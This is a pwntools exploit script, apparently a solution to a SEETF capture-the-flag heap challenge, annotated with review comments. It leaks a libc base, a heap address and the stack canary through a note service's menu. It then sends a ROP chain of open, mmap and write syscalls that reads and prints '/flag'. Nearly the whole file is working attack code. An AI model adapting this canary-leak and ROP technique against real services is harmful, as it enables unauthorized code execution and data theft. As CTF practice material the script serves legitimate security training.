from pwn import *

# Remote target and the two ELF handles every helper below relies on.
# `context.binary` is set so pwntools picks up the architecture/word size
# from 'chall'; `elf` itself is not referenced again in this listing.
# NOTE(review): payloads are built from plain str literals throughout, so
# this reads as a Python 2 pwntools script — confirm the interpreter.
io = remote('win.the.seetf.sg', 2000)
context.binary = 'chall'
elf = ELF('chall', checksec = False)
# Local libc copy used only for gadget offsets (see libc_os and the
# gadget block further down); it must match the remote libc for the
# offsets to hold.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec = False)
# Thin I/O wrappers around the pwntools tube; written as plain functions
# rather than lambdas so each one can carry a docstring.

def ru(x):
    """Receive up to delimiter *x* and return the data without it."""
    return io.recvuntil(x, drop = True)


def sd(x):
    """Send raw bytes *x* with no trailing newline."""
    return io.send(x)


def sla(a, b):
    """Wait for prompt *a*, then send *b* followed by a newline."""
    return io.sendlineafter(a, b)


def ia():
    """Hand the tube over to the user (interactive mode)."""
    return io.interactive()


def uu64(x):
    """Unpack up to 8 bytes as a little-endian u64, zero-padding on the right.

    NOTE(review): the pad is a str literal; on Python 3 a bytes argument
    would raise TypeError, so this assumes a Python 2 runtime.
    """
    padded = x.ljust(8, '\x00')
    return u64(padded)


def libc_os(x):
    """Rebase a libc offset onto libc_base (assigned later, at module level)."""
    return libc_base + x
def menu(choice):
    """Answer the challenge's '> ' prompt with *choice* (stringified)."""
    prompt = '> '
    answer = str(choice)
    sla(prompt, answer)
def add():
    """Select menu option 1 (create a note); nothing else is sent here."""
    CREATE = 1
    menu(CREATE)
def edit(idx, size, content):
    """Select menu option 2 and answer the idx/size prompts.

    *content* is only sent when size <= 0x100; for larger sizes the
    function returns after submitting the size (this mirrors whatever
    check the service applies — not verified from this file).
    """
    EDIT = 2
    menu(EDIT)
    sla('idx = ', str(idx))
    sla('size to write = ', str(size))
    if size > 0x100:
        return
    sd(content)
def show(idx):
    """Select menu option 3 and request note *idx* to be printed."""
    SHOW, prompt = 3, 'idx = '
    menu(SHOW)
    sla(prompt, str(idx))
# Exploit sequence. Reconstructed from a collapsed one-line listing, so the
# extent of the `for` body below is inferred (add() plus the i == 9 branch).

# Stage 1: the first create prints an address after ' is '; it is turned
# into libc_base with three constants that look like mapping deltas copied
# from one specific run. They are environment-specific and silently wrong
# if the remote libc/layout differs — not verifiable from this file.
add()
ru(' is ')
libc_base = int(ru('\n'), 16) - (0x7f911c154000 - 0x7f911bec9000) - (0x7fbff9120000 - 0x7fbff911b000) + 0xd000

# Stage 2: create 12 more notes; the address printed for i == 9 is kept as
# vec_addr (presumably note storage, given vec_addr + 0x10 is used as a
# string pointer further down — not confirmed here).
for i in range(12):
    add()
    if i == 9:
        ru(' is ')
        vec_addr = int(ru('\n'), 16)

# Note 10 holds [binary address + 0x300, 0x30, '/flag\0'].
edit(10, 0x50, flat([0x00000000004040A0+0x300, 0x30, '/flag\x00']))
# size 0x1770 exceeds the 0x100 guard in edit(), so 'a' is never sent;
# only the oversized size is submitted (intended effect not visible here).
edit(3, 0x1770, 'a')
show(3)
# Everything up to the next menu banner is the leaked note; its last 8
# bytes are taken as the stack canary.
data = ru('1. create note')
canary = uu64(data[-8:])

# Gadgets: libc-relative offsets rebased via libc_os. pop_rcx is assigned
# but not used in the chain below.
pop_rax = libc_os(0x0000000000045eb0)
pop_rdi = libc_os(0x000000000002a3e5)
pop_rsi = libc_os(0x00000000000da97d)
pop_rdx_r12 = libc_os(0x000000000011f497)
pop_rcx = libc_os(0x000000000008c6bb)
syscall = libc_os(0x0000000000091396)
# These two are absolute addresses (consistent with a non-PIE 'chall';
# assumed, not verified here).
pop_r8 = 0x000000000040149a
pop_r9 = 0x000000000040149d

# Three raw syscalls; the rax values are the x86-64 numbers for open (2),
# mmap (9) and write (1), assuming an x86-64 target as the libc path suggests.
rop_chain = flat([
    # rax=2, rdi=vec_addr + 0x10, rsi=0
    pop_rax, 2, pop_rdi, vec_addr + 0x10, pop_rsi, 0, syscall,
    # rax=9, rdi=0x2333000, rsi=0x50, rdx=1 (r12=0), r8=3, r9=0
    pop_rax, 9, pop_rdi, 0x2333000, pop_rsi, 0x50, pop_rdx_r12, 1, 0, pop_r8, 3, pop_r9, 0, syscall,
    # rax=1, rdi=1, rsi=0x2333000, rdx=0x50 (r12=0)
    pop_rax, 1, pop_rdi, 1, pop_rsi, 0x2333000, pop_rdx_r12, 0x50, 0, syscall
])

# Payload layout: menu choice '4' at 0, canary at 0x18, chain at 0x28,
# zero-filled in between. It is sent as the answer to the '> ' prompt.
pld = flat({ 0: '4', 0x18: canary, 0x28: rop_chain }, filler = '\x00')
menu(pld)
ia()